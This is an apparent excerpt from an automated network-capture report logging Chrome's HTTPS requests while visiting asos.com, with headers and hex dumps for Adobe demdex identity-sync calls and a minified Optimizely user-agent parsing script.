                                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: D/Da9/YwSFs=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-019e7c767.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:27 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  2024-10-29 19:11:28 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 39 31 38 38 39 37 37 32 35 30 37 36 32 38 32 37 33 32 30 30 30 34 35 35 34 37 30 32 38 32 34 36 34 34 34 39 34 30 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                  Data Ascii: {"d_mid":"91889772507628273200045547028246444940","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  124192.168.2.1649861104.18.66.574437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC531OUTGET /js/19181552552.js HTTP/1.1
                                                                                                                                                                                                                                                                  Host: cdn.optimizely.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:30 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  x-amz-id-2: tcUXEl62QE86b8AqCd2GBzS3vwYXWu3sngC7icLc16AW6nWrDRpfjkmbmViiEfLJBCND2Q+ZmyqeQQYI1HuH8eE+W39R21nAypz3NB5N9ZE=
                                                                                                                                                                                                                                                                  x-amz-request-id: 9QDRG82WHAG81S5R
                                                                                                                                                                                                                                                                  x-amz-replication-status: PENDING
                                                                                                                                                                                                                                                                  Last-Modified: Tue, 29 Oct 2024 17:04:28 GMT
                                                                                                                                                                                                                                                                  ETag: W/"ec404a585ca2422434fcbc20227eeae2"
                                                                                                                                                                                                                                                                  x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                  Cache-Control: max-age=120
                                                                                                                                                                                                                                                                  x-amz-meta-revision: 73001
                                                                                                                                                                                                                                                                  x-amz-meta-pci_enabled: False
                                                                                                                                                                                                                                                                  x-amz-version-id: yUtjZ6OrsoVjK5mBCgbbumPPD0rvsHEO
                                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                  Age: 404
                                                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: x-amz-meta-revision
                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                  Access-Control-Max-Age: 86400
                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                  CF-RAY: 8da578c6b8d8e552-DFW
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC424INData Raw: 37 62 65 37 0d 0a 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 63 6c 69 65 6e 74 2e 6d 69 6e 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 5f 5f 77 65 62 70 61 63 6b 5f 6d 6f 64 75 6c 65 73 5f 5f 3d 7b 35 32 35 31 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 65 29 7b 76 61 72 20 69 3b 21 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 61 3d 22 66 75 6e 63 74 69 6f 6e 22 2c 75 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 63 3d 22 6f 62 6a 65 63 74 22 2c 73 3d 22 73 74 72 69 6e 67 22 2c 66 3d 22 6d 6f 64 65 6c 22 2c 6c 3d 22 6e 61 6d 65 22 2c 64 3d 22 74 79 70 65 22 2c 76 3d 22 76 65 6e 64 6f
                                                                                                                                                                                                                                                                  Data Ascii: 7be7/*! For license information please see client.min.js.LICENSE.txt */(function(){var __webpack_modules__={5251:function(n,t,e){var i;!function(r,o){"use strict";var a="function",u="undefined",c="object",s="string",f="model",l="name",d="type",v="vendo
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 65 22 2c 52 3d 22 48 75 61 77 65 69 22 2c 43 3d 22 4c 47 22 2c 4e 3d 22 4d 69 63 72 6f 73 6f 66 74 22 2c 44 3d 22 4d 6f 74 6f 72 6f 6c 61 22 2c 4f 3d 22 4f 70 65 72 61 22 2c 78 3d 22 53 61 6d 73 75 6e 67 22 2c 4d 3d 22 53 68 61 72 70 22 2c 50 3d 22 53 6f 6e 79 22 2c 4c 3d 22 58 69 61 6f 6d 69 22 2c 55 3d 22 5a 65 62 72 61 22 2c 56 3d 22 46 61 63 65 62 6f 6f 6b 22 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 3d 7b 7d 2c 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 74 5b 6e 5b 65 5d 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 5d 3d 6e 5b 65 5d 3b 72 65 74 75 72 6e 20 74 7d 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 6e 3d 3d 3d 73 26 26 2d 31 21 3d 3d 7a 28 74 29 2e 69 6e
                                                                                                                                                                                                                                                                  Data Ascii: e",R="Huawei",C="LG",N="Microsoft",D="Motorola",O="Opera",x="Samsung",M="Sharp",P="Sony",L="Xiaomi",U="Zebra",V="Facebook",F=function(n){for(var t={},e=0;e<n.length;e++)t[n[e].toUpperCase()]=n[e];return t},B=function(n,t){return typeof n===s&&-1!==z(t).in
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 70 65 72 61 20 5b 6d 6f 62 69 6c 65 74 61 62 5d 7b 33 2c 36 7d 29 5c 62 2e 2b 76 65 72 73 69 6f 6e 5c 2f 28 5b 2d 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6f 70 65 72 61 29 28 3f 3a 2e 2b 76 65 72 73 69 6f 6e 5c 2f 7c 5b 5c 2f 20 5d 2b 29 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 6c 2c 68 5d 2c 5b 2f 6f 70 69 6f 73 5b 5c 2f 20 5d 2b 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 4f 70 65 72 61 20 4d 69 6e 69 22 5d 5d 2c 5b 2f 5c 62 6f 70 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 68 2c 5b 6c 2c 4f 5d 5d 2c 5b 2f 28 6b 69 6e 64 6c 65 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 6c 75 6e 61 73 63 61 70 65 7c 6d 61 78 74 68 6f 6e 7c 6e 65 74 66 72 6f 6e 74 7c 6a 61 73 6d 69 6e 65 7c 62 6c 61 7a 65 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c
                                                                                                                                                                                                                                                                  Data Ascii: pera [mobiletab]{3,6})\b.+version\/([-\w\.]+)/i,/(opera)(?:.+version\/|[\/ ]+)([\w\.]+)/i],[l,h],[/opios[\/ ]+([\w\.]+)/i],[h,[l,"Opera Mini"]],[/\bopr\/([\w\.]+)/i],[h,[l,O]],[/(kindle)\/([\w\.]+)/i,/(lunascape|maxthon|netfront|jasmine|blazer)[\/ ]?([\w\
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 73 65 72 2f 69 5d 2c 5b 5b 6c 2c 22 33 36 30 20 42 72 6f 77 73 65 72 22 5d 5d 2c 5b 2f 28 6f 63 75 6c 75 73 7c 73 61 6d 73 75 6e 67 7c 73 61 69 6c 66 69 73 68 7c 68 75 61 77 65 69 29 62 72 6f 77 73 65 72 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 28 2e 2b 29 2f 2c 22 24 31 20 42 72 6f 77 73 65 72 22 5d 2c 68 5d 2c 5b 2f 28 63 6f 6d 6f 64 6f 5f 64 72 61 67 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 5d 2c 5b 5b 6c 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 68 5d 2c 5b 2f 28 65 6c 65 63 74 72 6f 6e 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 20 73 61 66 61 72 69 2f 69 2c 2f 28 74 65 73 6c 61 29 28 3f 3a 20 71 74 63 61 72 62 72 6f 77 73 65 72 7c 5c 2f 28 32 30 5c 64 5c 64 5c 2e 5b 2d 5c 77 5c 2e 5d 2b 29 29 2f 69 2c 2f 6d 3f 28 71 71 62 72 6f 77 73 65 72
                                                                                                                                                                                                                                                                  Data Ascii: ser/i],[[l,"360 Browser"]],[/(oculus|samsung|sailfish|huawei)browser\/([\w\.]+)/i],[[l,/(.+)/,"$1 Browser"],h],[/(comodo_dragon)\/([\w\.]+)/i],[[l,/_/g," "],h],[/(electron)\/([\w\.]+) safari/i,/(tesla)(?: qtcarbrowser|\/(20\d\d\.[-\w\.]+))/i,/m?(qqbrowser
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 6f 78 2f 69 5d 2c 5b 68 2c 5b 6c 2c 22 46 69 72 65 66 6f 78 20 52 65 61 6c 69 74 79 22 5d 5d 2c 5b 2f 65 6b 69 6f 68 66 2e 2b 28 66 6c 6f 77 29 5c 2f 28 5b 5c 77 5c 2e 5d 2b 29 2f 69 2c 2f 28 73 77 69 66 74 66 6f 78 29 2f 69 2c 2f 28 69 63 65 64 72 61 67 6f 6e 7c 69 63 65 77 65 61 73 65 6c 7c 63 61 6d 69 6e 6f 7c 63 68 69 6d 65 72 61 7c 66 65 6e 6e 65 63 7c 6d 61 65 6d 6f 20 62 72 6f 77 73 65 72 7c 6d 69 6e 69 6d 6f 7c 63 6f 6e 6b 65 72 6f 72 7c 6b 6c 61 72 29 5b 5c 2f 20 5d 3f 28 5b 5c 77 5c 2e 5c 2b 5d 2b 29 2f 69 2c 2f 28 73 65 61 6d 6f 6e 6b 65 79 7c 6b 2d 6d 65 6c 65 6f 6e 7c 69 63 65 63 61 74 7c 69 63 65 61 70 65 7c 66 69 72 65 62 69 72 64 7c 70 68 6f 65 6e 69 78 7c 70 61 6c 65 6d 6f 6f 6e 7c 62 61 73 69 6c 69 73 6b 7c 77 61 74 65 72 66 6f 78 29 5c
                                                                                                                                                                                                                                                                  Data Ascii: ox/i],[h,[l,"Firefox Reality"]],[/ekiohf.+(flow)\/([\w\.]+)/i,/(swiftfox)/i,/(icedragon|iceweasel|camino|chimera|fennec|maemo browser|minimo|conkeror|klar)[\/ ]?([\w\.\+]+)/i,/(seamonkey|k-meleon|icecat|iceape|firebird|phoenix|palemoon|basilisk|waterfox)\
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 63 6f 72 65 6d 65 64 69 61 5c 2f 5b 5c 77 5c 2e 5d 2b 20 5c 28 28 69 70 61 64 29 2f 69 2c 2f 5c 62 28 69 70 61 64 29 5c 64 5c 64 3f 2c 5c 64 5c 64 3f 5b 3b 5c 5d 5d 2e 2b 69 6f 73 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 6d 61 63 69 6e 74 6f 73 68 29 3b 2f 69 5d 2c 5b 66 2c 5b 76 2c 49 5d 5d 2c 5b 2f 5c 62 28 73 68 2d 3f 5b 61 6c 74 76 7a 5d 3f 5c 64 5c 64 5b 61 2d 65 6b 6d 5d 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 4d 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 28 3f 3a 61 67 5b 72 73 5d 5b 32 33 5d 3f 7c 62 61 68 32 3f 7c 73 68 74 3f 7c 62 74 76 29 2d 61 3f 5b 6c 77 5d 5c 64 7b 32 7d 29 5c 62 28 3f 21 2e 2b 64 5c 2f 73 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 52 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 68 75 61 77 65 69 7c 68 6f 6e 6f 72
                                                                                                                                                                                                                                                                  Data Ascii: coremedia\/[\w\.]+ \((ipad)/i,/\b(ipad)\d\d?,\d\d?[;\]].+ios/i],[f,[v,I],[d,_]],[/(macintosh);/i],[f,[v,I]],[/\b(sh-?[altvz]?\d\d[a-ekm]?)/i],[f,[v,M],[d,m]],[/\b((?:ag[rs][23]?|bah2?|sht?|btv)-a?[lw]\d{2})\b(?!.+d\/s)/i],[f,[v,R],[d,_]],[/(?:huawei|honor
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 6f 69 64 20 74 76 29 5c 77 2b 29 2f 69 2c 2f 5c 62 6c 67 2d 3f 28 5b 5c 64 5c 77 5d 2b 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 43 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 69 64 65 61 74 61 62 5b 2d 5c 77 20 5d 2b 29 2f 69 2c 2f 6c 65 6e 6f 76 6f 20 3f 28 73 5b 35 36 5d 30 30 30 5b 2d 5c 77 5d 2b 7c 74 61 62 28 3f 3a 5b 5c 77 20 5d 2b 29 7c 79 74 5b 2d 5c 64 5c 77 5d 7b 36 7d 7c 74 62 5b 2d 5c 64 5c 77 5d 7b 36 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4c 65 6e 6f 76 6f 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 28 3f 3a 6d 61 65 6d 6f 7c 6e 6f 6b 69 61 29 2e 2a 28 6e 39 30 30 7c 6c 75 6d 69 61 20 5c 64 2b 29 2f 69 2c 2f 6e 6f 6b 69 61 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5c 2e 5d 2a 29 2f 69 5d 2c 5b 5b 66 2c 2f 5f 2f 67 2c 22 20 22 5d 2c 5b 76 2c 22 4e 6f 6b 69 61 22
                                                                                                                                                                                                                                                                  Data Ascii: oid tv)\w+)/i,/\blg-?([\d\w]+) bui/i],[f,[v,C],[d,m]],[/(ideatab[-\w ]+)/i,/lenovo ?(s[56]000[-\w]+|tab(?:[\w ]+)|yt[-\d\w]{6}|tb[-\d\w]{6})/i],[f,[v,"Lenovo"],[d,_]],[/(?:maemo|nokia).*(n900|lumia \d+)/i,/nokia[-_ ]?([-\w\.]*)/i],[[f,/_/g," "],[v,"Nokia"
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 5b 61 62 5d 5b 31 2d 37 5d 2d 3f 5b 30 31 37 38 61 5d 5c 64 5c 64 3f 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 41 63 65 72 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 6d 5b 31 2d 35 5d 20 6e 6f 74 65 29 20 62 75 69 2f 69 2c 2f 5c 62 6d 7a 2d 28 5b 2d 5c 77 5d 7b 32 2c 7d 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4d 65 69 7a 75 22 5d 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 28 62 6c 61 63 6b 62 65 72 72 79 7c 62 65 6e 71 7c 70 61 6c 6d 28 3f 3d 5c 2d 29 7c 73 6f 6e 79 65 72 69 63 73 73 6f 6e 7c 61 63 65 72 7c 61 73 75 73 7c 64 65 6c 6c 7c 6d 65 69 7a 75 7c 6d 6f 74 6f 72 6f 6c 61 7c 70 6f 6c 79 74 72 6f 6e 29 5b 2d 5f 20 5d 3f 28 5b 2d 5c 77 5d 2a 29 2f 69 2c 2f 28 68 70 29 20 28 5b 5c 77 20 5d 2b 5c 77 29 2f 69 2c 2f 28 61 73 75 73 29 2d 3f 28 5c 77 2b 29
                                                                                                                                                                                                                                                                  Data Ascii: [ab][1-7]-?[0178a]\d\d?)/i],[f,[v,"Acer"],[d,_]],[/droid.+; (m[1-5] note) bui/i,/\bmz-([-\w]{2,})/i],[f,[v,"Meizu"],[d,m]],[/(blackberry|benq|palm(?=\-)|sonyericsson|acer|asus|dell|meizu|motorola|polytron)[-_ ]?([-\w]*)/i,/(hp) ([\w ]+\w)/i,/(asus)-?(\w+)
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 74 29 28 5c 77 7b 35 7d 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 44 72 61 67 6f 6e 20 54 6f 75 63 68 22 5d 2c 66 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 6e 73 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 49 6e 73 69 67 6e 69 61 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 28 6e 78 61 7c 6e 65 78 74 29 2d 3f 5c 77 7b 30 2c 39 7d 29 20 62 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 65 78 74 42 6f 6f 6b 22 5d 2c 5b 64 2c 5f 5d 5d 2c 5b 2f 5c 62 28 78 74 72 65 6d 65 5c 5f 29 3f 28 76 28 31 5b 30 34 35 5d 7c 32 5b 30 31 35 5d 7c 5b 33 34 36 39 5d 30 7c 37 5b 30 35 5d 29 29 20 62 2f 69 5d 2c 5b 5b 76 2c 22 56 6f 69 63 65 22 5d 2c 66 2c 5b 64 2c 6d 5d 5d 2c 5b 2f 5c 62 28 6c 76 74 65 6c 5c 2d 29 3f 28 76 31 5b 31 32 5d 29 20 62 2f 69 5d 2c 5b 5b 76 2c
                                                                                                                                                                                                                                                                  Data Ascii: t)(\w{5}) b/i],[[v,"Dragon Touch"],f,[d,_]],[/\b(ns-?\w{0,9}) b/i],[f,[v,"Insignia"],[d,_]],[/\b((nxa|next)-?\w{0,9}) b/i],[f,[v,"NextBook"],[d,_]],[/\b(xtreme\_)?(v(1[045]|2[015]|[3469]0|7[05])) b/i],[[v,"Voice"],f,[d,m]],[/\b(lvtel\-)?(v1[12]) b/i],[[v,
                                                                                                                                                                                                                                                                  2024-10-29 19:11:30 UTC1369INData Raw: 70 65 72 61 20 74 76 7c 74 76 3b 20 72 76 3a 29 5c 62 2f 69 5d 2c 5b 5b 64 2c 77 5d 5d 2c 5b 2f 28 6f 75 79 61 29 2f 69 2c 2f 28 6e 69 6e 74 65 6e 64 6f 29 20 28 5b 77 69 64 73 33 75 74 63 68 5d 2b 29 2f 69 5d 2c 5b 76 2c 66 2c 5b 64 2c 67 5d 5d 2c 5b 2f 64 72 6f 69 64 2e 2b 3b 20 28 73 68 69 65 6c 64 29 20 62 75 69 2f 69 5d 2c 5b 66 2c 5b 76 2c 22 4e 76 69 64 69 61 22 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 70 6c 61 79 73 74 61 74 69 6f 6e 20 5b 33 34 35 70 6f 72 74 61 62 6c 65 76 69 5d 2b 29 2f 69 5d 2c 5b 66 2c 5b 76 2c 50 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 5c 62 28 78 62 6f 78 28 3f 3a 20 6f 6e 65 29 3f 28 3f 21 3b 20 78 62 6f 78 29 29 5b 5c 29 3b 20 5d 2f 69 5d 2c 5b 66 2c 5b 76 2c 4e 5d 2c 5b 64 2c 67 5d 5d 2c 5b 2f 28 28 70 65 62 62 6c 65 29 29 61 70 70
                                                                                                                                                                                                                                                                  Data Ascii: pera tv|tv; rv:)\b/i],[[d,w]],[/(ouya)/i,/(nintendo) ([wids3utch]+)/i],[v,f,[d,g]],[/droid.+; (shield) bui/i],[f,[v,"Nvidia"],[d,g]],[/(playstation [345portablevi]+)/i],[f,[v,P],[d,g]],[/\b(xbox(?: one)?(?!; xbox))[\); ]/i],[f,[v,N],[d,g]],[/((pebble))app


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  125192.168.2.164995654.194.45.2274437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:32 UTC661OUTGET /ibs:dpid=411&dpuuid=ZyEzYwAAANsMEgN- HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:32 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:32 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: 9qfu0GPMTo4=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-085fb57a6.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                                                                                  set-cookie: dpm=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:32 GMT; Path=/; Domain=.dpm.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:32 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  2024-10-29 19:11:32 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                  Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  126192.168.2.164995854.171.192.424437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:33 UTC473OUTGET /ibs:dpid=411&dpuuid=ZyEzYwAAANsMEgN- HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896; dpm=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:33 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:33 GMT
                                                                                                                                                                                                                                                                  Content-Type: image/gif
                                                                                                                                                                                                                                                                  Content-Length: 42
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: fzuk1aRGTs8=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-0eb1e1901.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                  set-cookie: dpm=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:33 GMT; Path=/; Domain=.dpm.demdex.net; Secure; SameSite=None
